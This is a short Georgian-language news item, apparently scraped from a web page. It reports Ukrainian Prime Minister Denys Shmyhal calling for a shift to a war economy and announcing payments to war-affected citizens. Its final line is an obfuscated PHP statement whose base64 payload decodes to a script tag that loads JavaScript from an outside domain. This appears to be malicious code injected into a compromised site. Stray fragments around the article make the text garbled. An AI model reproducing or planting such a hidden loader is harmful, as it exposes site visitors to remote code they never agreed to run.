celsiusi
ავერსი შნაიდერი
უკრაინის პრემიერ-მინისტრის, დენის შმიგალის განცხადებით, უკრაინა საომარ ეკონომიკაზე უნდა გადაეწყოს. ამის შესახებ შმიგალმა ყოველდღიურ მიმართვაში განაცხადა.
 
„ასობით უცხოური კომპანია ხურავს წარმოებას და კრძალავს მათი საქონლის გაყიდვას აგრესორ ქვეყანაში. ვიდრე რუსეთი ყველა ფრონტზე მარცხდება, ჩვენ სწრაფად უნდა გადავეწყოთ საომარ ეკონომიკაზე. ეს არ არის მხოლოდ იარაღი, ეს არის საკვები, მედიკამენტები, საწვავი და ა.შ. ჩვენ ვალდებულნი ვართ მივაწოდოთ ქვეყანას ყველაფერი, რაც მას სჭირდება. მთავრობამ უკვე შემოიღო შეზღუდვები სოციალურად მნიშვნელოვანი საქონლისა და ნედლეულის ექსპორტზე, რითაც ისინი იწარმოება. სასურსათო უსაფრთხოებაზე კონტროლი ახლა ეკონომიკის სამინისტროს ერთ-ერთი პრიორიტეტია“, – განაცხადა შმიგალმა.
 
ამასთან უკრაინის პრემიერის თქმით, პრეზიდენტის განკარგულებით ყველა უკრაინელი, რომელიც ომის შედეგად დაზარალდა სახელმწიფოსგან 6 500 გრივნას მიიღებს.
807
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");